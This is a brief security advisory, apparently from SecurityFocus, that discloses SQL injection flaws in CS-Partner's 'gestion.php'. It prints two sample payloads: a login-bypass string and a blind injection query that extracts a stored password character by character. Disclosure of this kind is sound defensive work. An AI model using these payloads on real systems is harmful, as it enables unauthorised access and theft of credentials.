CS-Partner 'gestion.php' Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example SQL queries are available:

' or '1=1
' or ascii(substring((select password from CSPartner where id=1),1,1))=[97]/*


 

Privacy Statement
Copyright 2010, SecurityFocus